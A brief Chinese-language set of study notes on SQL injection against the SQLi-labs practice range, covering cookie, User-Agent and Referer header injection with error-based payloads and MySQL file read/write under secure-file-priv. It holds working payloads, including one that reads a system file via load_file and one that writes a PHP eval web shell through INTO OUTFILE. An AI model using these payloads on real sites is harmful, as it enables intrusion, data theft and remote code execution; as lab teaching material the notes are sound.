宽字节注入

Cookie注入

    使用靶场SQLi-labs 第20关；

    cookie注入的注入参数需要通过cookie提交，可以通过【document.cookie】在控制台完成对浏览器cookie的读写。

    方法一、在控制台输入：

    document.cookie="uname=Dumb' and extractvalue(1,concat(0x5e,version(),0x5e))#"

    方法二、通过bp抓包

    在使用dump用户登录前后，分别使用bp进行抓包，经过对两个数据包的对比，分析出登录用户后出现cookie字段，经过对cookie字段中uname=Dumb进行注入，发现可以进行报错注入。

    uname=dumb' and updatexml(1,concat(0x5e,(select version(),0x5e)),1)

http头部注入

    http头部注入就是指注入http头部报文字段，这些字段通常有user-agent、referer等。

    @    user-agent注入

    如第18关

    user-agent：hacker' and updatexml(1,concat(0x5e,database(),0x5e),1) and '1'='1

    @    referer注入

    第19关，注入字段referer

    hacker' and updatexml(1,concat(0x5e,database(),0x5e),1) and '1'='1

secure-file-priv注入

@前提

    我们可以利用SQL注入漏洞读写文件，但是读写文件需要一定的条件。

   1、secure-file-priv

    可以再phpmyadmin中看到该变量。

    该参数再高版本的mysql数据库中限制了文件的导入导出操做。改变该参数可以再my.ini配置文件中修改，然后重启mysql服务。

    关于该参数值得相关说明

    secure-file-priv=空        不对mysql服务的导入导出做出限制

    secure-file-priv='c:/a/'    限制mysql服务的导入导出操做发生在c:/a/下（子目录有效）

    secure-file-priv=null        限制mysql服务不允许导入导出操做

    2、当前用户具有文件权限

    查询语句：select File_priv from mysql.user where user="root" and host="localhost"

    3、要知道写入目标文件的绝对路径

    @读取文件

    ?id=-1' union select 1,load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'),3 --+

    @写入文件

    ?id=1' and 1=2 union select 1,'<?php @eval($_REQUEST[111]);?>',3 into outfile 'c:\\phpstudy\\www\\1.php' --+

    直接传入参数，页面如果不报错说明写入成功，可以直接访问写入文件